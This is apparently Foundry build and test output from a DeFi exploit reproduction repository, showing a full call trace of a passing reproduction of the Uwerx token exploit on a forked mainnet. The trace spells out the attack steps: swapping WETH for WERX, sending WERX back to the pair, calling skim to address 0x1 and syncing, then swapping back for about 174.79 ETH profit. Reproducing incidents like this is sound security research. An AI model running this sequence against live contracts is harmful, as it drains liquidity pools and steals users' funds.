Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-08/Uwerx_exp.sol:21:5:
   |
21 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 637.70ms (1.89ms CPU time)

Ran 1 test for src/test/2023-08/Uwerx_exp.sol:ContractTest
[PASS] testExploit() (gas: 452468)
Logs:
  Attacker WETH balance after exploit: 20174.786100489116297833
  Attacker WETH balance after exploit, ETH PROFIT: 174.786100489116297833

Traces:
  [15135] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("<rpc url>", 17826202 [1.782e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(WERX: [0x4306B12F8e824cE1fa9604BbD88f2AD4f0FE3c54], "WERX")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], "pair")
    │   └─ ← [Return]
    └─ ← [Stop]

  [570850] ContractTest::testExploit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x00000000000000000000000000000000000000000000043c33c1937564800000)
    │   └─ ← [Return]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 20000000000000000000000 [2e22]
    ├─ [24420] WETH::approve(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [25279] WERX::approve(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [33220] pair::sync()
    │   ├─ [2952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 5097936050192694905259125 [5.097e24]
    │   ├─ [2534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 174786100489116297837 [1.747e20]
    │   ├─ emit Sync(reserve0: 5097936050192694905259125 [5.097e24], reserve1: 174786100489116297837 [1.747e20])
    │   ├─  storage changes:
    │   │   @ 10: 0x000000000000000000000000000058bea5ca4867d1cef308f8bc0e1c1a3f5210 → 0x000000000000000000000000000068a42c530b8226d01f33a557ac538206dd00
    │   │   @ 9: 0x000000000000000000000000000000000001bf15f10ba4bcad60c0c91d3c4660 → 0x0000000000000000000000000000000000020f5801b06b30da3073fc9d5c7ea0
    │   │   @ 8: 0x64c9f3c700000000000979a4f856a181aa6d000000043787aac32b76fb65c475 → 0x64ca177f00000000000979a4f856a181aa6d000000043787aac32b76fb65c475
    │   └─ ← [Stop]
    ├─ [60647] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(20000000000000000000000 [2e22], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x4306B12F8e824cE1fa9604BbD88f2AD4f0FE3c54], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1690965887 [1.69e9])
    │   ├─ [6225] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], 20000000000000000000000 [2e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], value: 20000000000000000000000 [2e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000043c33c1937564800000 → 0
    │   │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x00000000000000000000000000000000000000000000000979a4f856a181aa6d → 0x000000000000000000000000000000000000000000000445ad668bcc0601aa6d
    │   │   └─ ← [Return] true
    │   ├─ [2952] WERX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [504] pair::getReserves() [staticcall]
    │   │   └─ ← [Return] 5097936050192694905259125 [5.097e24], 174786100489116297837 [1.747e20], 1690965887 [1.69e9]
    │   ├─ [534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 20174786100489116297837 [2.017e22]
    │   ├─ [42288] pair::swap(5053637872806935777652180 [5.053e24], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [28695] WERX::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5053637872806935777652180 [5.053e24])
    │   │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5053637872806935777652180 [5.053e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x000000000000000000000000000000000000000000043787aac32b76fb65c475 → 0x00000000000000000000000000000000000000000000096168b4be8b96eb96a1
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000042e26420e6ceb647a2dd4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   │   └─ ← [Return] 44298177385759127606945 [4.429e22]
    │   │   ├─ [534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   │   └─ ← [Return] 20174786100489116297837 [2.017e22]
    │   │   ├─ emit Sync(reserve0: 44298177385759127606945 [4.429e22], reserve1: 20174786100489116297837 [2.017e22])
    │   │   ├─ emit Swap(sender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 20000000000000000000000 [2e22], amount0Out: 5053637872806935777652180 [5.053e24], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x64ca177f00000000000979a4f856a181aa6d000000043787aac32b76fb65c475 → 0x64ca177f000000000445ad668bcc0601aa6d00000000096168b4be8b96eb96a1
    │   │   └─ ← [Stop]
    │   ├─ [952] WERX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 5053637872806935777652180 [5.053e24]
    │   └─ ← [Stop]
    ├─ [3995] WERX::transfer(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], 4429817738575912760684500 [4.429e24])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], value: 4429817738575912760684500 [4.429e24])
    │   ├─  storage changes:
    │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x00000000000000000000000000000000000000000000096168b4be8b96eb96a1 → 0x00000000000000000000000000000000000000000003b36e4f4f2d128af24675
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000042e26420e6ceb647a2dd4 → 0x0000000000000000000000000000000000000000000084195b73fe6470737e00
    │   └─ ← [Return] true
    ├─ [52454] pair::skim(ECRecover: [0x0000000000000000000000000000000000000001])
    │   ├─ [952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 4474115915961671888291445 [4.474e24]
    │   ├─ [38847] WERX::transfer(ECRecover: [0x0000000000000000000000000000000000000001], 4429817738575912760684500 [4.429e24])
    │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: ECRecover: [0x0000000000000000000000000000000000000001], value: 4296923206418635377863965 [4.296e24])
    │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: 0x991C13B817eDE749fBe5F51527Af58Db3E859cD9, value: 88596354771518255213690 [8.859e22])
    │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: 0x0000000000000000000000000000000000000000, value: 44298177385759127606845 [4.429e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x00000000000000000000000000000000000000000003b36e4f4f2d128af24675 → 100
    │   │   │   @ 0xa15bc60c955c405d20d9149c709e2460f1c2d9a497496a7f46004d1772c3054c: 0 → 0x00000000000000000000000000000000000000000003aa0ce69a6e86f406afd4
    │   │   │   @ 5: 0x0000000000000000000000000000000000000000026c62ad77dc602dae000000 → 0x0000000000000000000000000000000000000000026c594c0f27a1a2171469c3
    │   │   └─ ← [Return] true
    │   ├─ [534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 20174786100489116297837 [2.017e22]
    │   ├─ [5262] WETH::transfer(ECRecover: [0x0000000000000000000000000000000000000001], 0)
    │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: ECRecover: [0x0000000000000000000000000000000000000001], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 5: 0x0000000000000000000000000000000000000000026c62ad77dc602dae000000 → 0x0000000000000000000000000000000000000000026c594c0f27a1a2171469c3
    │   └─ ← [Stop]
    ├─ [8004] pair::sync()
    │   ├─ [952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 100
    │   ├─ [534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 20174786100489116297837 [2.017e22]
    │   ├─ emit Sync(reserve0: 100, reserve1: 20174786100489116297837 [2.017e22])
    │   ├─  storage changes:
    │   │   @ 8: 0x64ca177f000000000445ad668bcc0601aa6d00000000096168b4be8b96eb96a1 → 0x64ca177f000000000445ad668bcc0601aa6d0000000000000000000000000064
    │   └─ ← [Stop]
    ├─ [952] WERX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 623820134231023016967680 [6.238e23]
    ├─ [51084] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(623820134231023016967680 [6.238e23], 0, [0x4306B12F8e824cE1fa9604BbD88f2AD4f0FE3c54, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1690965887 [1.69e9])
    │   ├─ [4663] WERX::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], 623820134231023016967680 [6.238e23])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], value: 623820134231023016967680 [6.238e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 100 → 0x0000000000000000000000000000000000000000000084195b73fe6470737e64
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000084195b73fe6470737e00 → 0
    │   │   └─ ← [Return] true
    │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [504] pair::getReserves() [staticcall]
    │   │   └─ ← [Return] 100, 20174786100489116297837 [2.017e22], 1690965887 [1.69e9]
    │   ├─ [952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   └─ ← [Return] 623820134231023016967780 [6.238e23]
    │   ├─ [36755] pair::swap(0, 20174786100489116297833 [2.017e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [23162] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20174786100489116297833 [2.017e22])
    │   │   │   ├─ emit Transfer(from: pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20174786100489116297833 [2.017e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x000000000000000000000000000000000000000000000445ad668bcc0601aa6d → 4
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000445ad668bcc0601aa69
    │   │   │   └─ ← [Return] true
    │   │   ├─ [952] WERX::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   │   └─ ← [Return] 623820134231023016967780 [6.238e23]
    │   │   ├─ [534] WETH::balanceOf(pair: [0xa41529982BcCCDfA1105C6f08024DF787CA758C4]) [staticcall]
    │   │   │   └─ ← [Return] 4
    │   │   ├─ emit Sync(reserve0: 623820134231023016967780 [6.238e23], reserve1: 4)
    │   │   ├─ emit Swap(sender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 623820134231023016967680 [6.238e23], amount1In: 0, amount0Out: 0, amount1Out: 20174786100489116297833 [2.017e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x64ca177f000000000445ad668bcc0601aa6d0000000000000000000000000064 → 0x64ca177f00000000000000000000000000040000000084195b73fe6470737e64
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 20174786100489116297833 [2.017e22]
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 20174786100489116297833 [2.017e22]
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH balance after exploit", val: 20174786100489116297833 [2.017e22], decimals: 18)
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 20174786100489116297833 [2.017e22]
    ├─ [444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH balance after exploit, ETH PROFIT", val: 174786100489116297833 [1.747e20], decimals: 18)
    ├─  storage changes:
    │   @ 0xe75cc7b06eeac0726b56b61f551cc87de719bb5f8349548f48ff38ca3294b488: 0x00000000000000000000000000000000000000000000096168b4be8b96eb96a1 → 0x00000000000000000000000000000000000000000003b36e4f4f2d128af24675
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a5a: 0 → 1
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a57: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000043c33c1937564800000
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.55s (8.45s CPU time)

Ran 2 test suites in 10.62s (11.19s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
